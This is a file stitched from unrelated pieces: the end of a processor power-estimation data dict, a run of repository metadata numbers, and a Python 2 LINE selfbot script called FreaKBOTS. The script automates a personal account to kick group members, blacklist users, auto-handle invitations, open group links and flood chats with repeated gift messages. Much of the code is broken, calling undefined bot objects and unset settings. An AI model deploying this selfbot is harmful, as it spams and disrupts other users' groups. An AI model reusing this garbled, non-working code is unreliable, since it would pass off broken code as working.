'Load Store Unit/Data Cache/Peak Dynamic': 2.11796,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.570676,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0284973,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0284973,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.25253,
'Load Store Unit/Runtime Dynamic': 0.739712,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0702696,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.140539,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0249389,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.02643,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.153405,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0128397,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.352354,
'Memory Management Unit/Runtime Dynamic': 0.0392696,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.9906,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.291013,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00940999,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0592033,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.359626,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.97576,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 5.3747027051529725,
'Runtime Dynamic': 5.3747027051529725,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.215643,
'Runtime Dynamic': 0.150799,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 80.3665,
'Peak Power': 113.479,
'Runtime Dynamic': 18.2931,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 80.1508,
'Total Cores/Runtime Dynamic': 18.1423,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.215643,
'Total L3s/Runtime Dynamic': 0.150799,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.049234
| 124
| 0.68193
| 8,088
| 68,595
| 5.777572
| 0.067137
| 0.123606
| 0.112992
| 0.093475
| 0.940315
| 0.931263
| 0.919365
| 0.888078
| 0.862976
| 0.84271
| 0
| 0.131494
| 0.224375
| 68,595
| 914
| 125
| 75.049234
| 0.746805
| 0
| 0
| 0.642232
| 0
| 0
| 0.657546
| 0.048108
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64c12b40df78806d7534678705359240bd968d29
| 263,124
|
py
|
Python
|
FreaKBOTS/FreaKBOTS.py
|
faizarmedi/freakbot
|
bfe5fa54e10312a5eb8f94f2d7c30c4490810dda
|
[
"Unlicense"
] | 1
|
2021-04-03T13:28:25.000Z
|
2021-04-03T13:28:25.000Z
|
FreaKBOTS/FreaKBOTS.py
|
faizarmedi/freakbot
|
bfe5fa54e10312a5eb8f94f2d7c30c4490810dda
|
[
"Unlicense"
] | null | null | null |
FreaKBOTS/FreaKBOTS.py
|
faizarmedi/freakbot
|
bfe5fa54e10312a5eb8f94f2d7c30c4490810dda
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
#from imgurpython import ImgurClient
import time, random, sys, re, os, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, tempfile, glob, shutil, unicodedata, goslate
cl = LINETCR.LINE()
cl.login(qr=True)
cl.loginResult()
print "SELFBOT FreaKBOTS\nSUCCES LOGIN\nSELAMAT MENGGUNAKANYA KAWAN"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage="""KEYWORD LIST
✰ Me
✰ Add
✰ Cn "text"
✰ Clockname "text"
✰ TL:"text"
✰ Ban:"mid"
✰ Unban:"mid"
✰ Bl:on
✰ Unbl:on
✰ Mcheck
✰ Mybio:
✰ Mybots
✰ Mymid
✰ Mygroups
✰ Group id
✰ Message set:"text"
✰ Message confirm
✰ Msg add-"text"
✰ Com set:"text"
✰ Comment
✰ Comban/del/cek
✰ Help set:"text"
✰ Change
✰ Gn "text"
✰ Clink/Curl
✰ Kick:"mid"
✰ Invite:"mid"
✰ Creator
✰ Contact
✰ Gcancel:"jumlah"
✰ Gcancelall
✰ Ginfo
✰ Check
✰ Cctv
✰ Glink
✰ Spam on/off
✰ Gurl
✰ Clink
✰ Blocklist
✰ Banlist
✰ Update
✰ Creator
✰ Mypict
✰ Ban "@"
✰ Unban "@"
✰ Sc @
✰ Nuke
✰ Backup
✰ Tagall
✰ Bc "text"
✰ Say "text"
✰ Bom "text"
✰ Kick@mbl
✰ Audio "text"
✰ Reinvite
✰ Clearban
✰ Clear
✰ jointicket
✰ Youtube
✰ Copy @
✰ Backup @
✰ Getcover @
✰ Getbio @
✰ Getinfo @
✰ Gimage
✰ Lirik "text"
✰ pict @
✰ Translate️
✰ Wc️
✰ Spam @
✰ Spam gift️
✰ Gift @
✰ Ig "name"
✰ Sikat "@"
✰ Clear
✰ Ban:on/Unbl:on
✰ Contact:on/off
✰ Add:on/off
✰ Join:on/off
✰ Leave:on/off
✰ Share:on/off
✰ Com:on/off
✰ Clock:on/off
SETTING GROUP
★ Pro:on/off
★ Prolink:on/off
★ Proinvite:on/off
★ Procancel:on/off
"""
helo="""SILAHKAN GUNAKAN BOT NYA .JIKA KAMU MAU TAMBAHIN ATAU EDIT LAGI SCRIPT NYA SILAHKN
TAPI TOLONG HARGAI SAYA UNTUK TIDAK MERUBAH LEBEL FreaKBOTS DAN AUTO ADD ATAU AUTO LIKE TERIMAKASIH :D"""
KAC=[cl]
mid = cl.getProfile().mid
#kimid = ki.getProfile().mid
#ki2mid = ki2.getProfile().mid
#ki3mid = ki3.getProfile().mid
#ki4mid = ki4.getProfile().mid
#ki5mid = ki5.getProfile().mid
#ki6mid = ki6.getProfile().mid
Bots=[mid]
admsa = "mid kamu"
wait = {
'contact':False,
'autoJoin':False,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':True,
'message':"""FreaK-FreaK-FreaK-FreaK
""",
"commentOn":False,
"likeOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"",
"cNames":"",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
"atjointicket":True,
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
return image
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendImage(self, to_, path):
M = Message(to=to_, text=None, contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M2 = self._client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://obs-sg.line-apps.com/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendImage2(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except:
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
except:
pass
def bot(op):
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace(" ",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
cl.comment(url[25:58], url[66:], wait["comment1"])
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"sudah masuk daftar hitam👈")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Itu tidak berkomentar👈")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"Tidak ada dalam daftar hitam👈")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"sudah masuk daftar hitam")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done👈")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpMessage)
elif ("Gn:" in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("Gn:","")
ki.updateGroup(group)
else:
cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok👈")
elif ("Gn " in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("Gn ","")
cl.updateGroup(group)
else:
cl.sendText(msg.to,"Can not be used for groups other than")
elif "Kick:" in msg.text:
midd = msg.text.replace("Kick:","")
cl.kickoutFromGroup(msg.to,[midd])
elif "Invite:" in msg.text:
midd = msg.text.replace("Invite:","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "Me" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif "Mybots" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki6mid}
cl.sendMessage(msg)
elif "B1" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
elif "B2" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
elif "B3" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
elif "B4" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
elif "B5" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
elif "B6" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki6mid}
ki6.sendMessage(msg)
elif "Creator" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u84734a2bb2201d465e6015f90dc462f0'}
cl.sendMessage(msg)
elif msg.text in ["Allgift","B1 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text in ["Gift","i gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Allgift","B2 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["Allgift","B3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Allgift","B4 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["Allgift","B5 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
ki5.sendMessage(msg)
elif msg.text in ["Allgift","B6 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
ki6.sendMessage(msg)
elif msg.text in ["Allgift","B7 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
ki7.sendMessage(msg)
elif msg.text in ["Allgift","B8 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '13'}
msg.text = None
ki8.sendMessage(msg)
elif msg.text in ["Allgift","B9 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '11'}
msg.text = None
ki9.sendMessage(msg)
elif msg.text in ["Allgift","B10 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
ki10.sendMessage(msg)
elif msg.text in ["Allgift","B11 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
ki11.sendMessage(msg)
elif msg.text in ["Allgift","B12 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
ki12.sendMessage(msg)
elif msg.text in ["Allgift","B13 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '9'}
msg.text = None
ki13.sendMessage(msg)
elif msg.text in ["Allgift","B14 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '1'}
msg.text = None
ki14.sendMessage(msg)
elif msg.text in ["Allgift","B15 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki15.sendMessage(msg)
elif msg.text in ["Allgift","B16 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki16.sendMessage(msg)
elif msg.text in ["Allgift","B17 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki17.sendMessage(msg)
elif msg.text in ["Allgift","B18 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki18.sendMessage(msg)
elif msg.text in ["Spam gift"]:
#if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
#-------------------------Audio------------------------------------------#
#------------------------------------------------------------------------#
elif msg.text in ["B Cancel","Cancel dong","Bcancel"]:
if msg.toType == 2:
group = ki.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
ki.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No invites👈")
else:
cl.sendText(msg.to,"Invite people inside not👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan")
else:
cl.sendText(msg.to,"invitan tidak ada")
elif msg.text in ["Cancel","cancel"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No invites👈")
else:
cl.sendText(msg.to,"Invite people inside not👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan👈")
else:
cl.sendText(msg.to,"invitan tidak ada")
#-------------------------
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Clink"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = False
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL open ô€¨ô€„Œ")
else:
cl.sendText(msg.to,"URL open ô€¨ô€„Œ")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than")
elif msg.text in ["Curl"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = True
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL close 👈")
else:
cl.sendText(msg.to,"URL close 👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group 👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ")
elif "Ginfo" == msg.text:
if msg.toType == 2:
# if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
QR = "Close"
else:
QR = "Open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + "🗜️" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + "🗜️" + gCreator + "\n\n[Group Status]\n" + "⛔️Status QR 👉" + QR + "\n\n[Group Picture]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
#else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "Creator" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': 'ufce863f62f40706c01fa4a3c3c4cb096'}
cl.sendMessage(msg)
elif "Mymid" == msg.text:
cl.sendText(msg.to,mid)
elif "B1 mid" == msg.text:
ki.sendText(msg.to,kimid)
elif "B2 mid" == msg.text:
ki2.sendText(msg.to,ki2mid)
elif "B3 mid" == msg.text:
ki3.sendText(msg.to,ki3mid)
elif "B4 mid" == msg.text:
ki4.sendText(msg.to,ki4mid)
elif "B5 mid" == msg.text:
ki5.sendText(msg.to,ki5mid)
elif "B6 mid" == msg.text:
ki6.sendText(msg.to,ki6mid)
elif "All mid" == msg.text:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,kimid)
ki2.sendText(msg.to,ki2mid)
ki3.sendText(msg.to,ki3mid)
ki4.sendText(msg.to,ki4mid)
ki5.sendText(msg.to,ki5mid)
ki6.sendText(msg.to,ki6mid)
elif "TL:" in msg.text:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
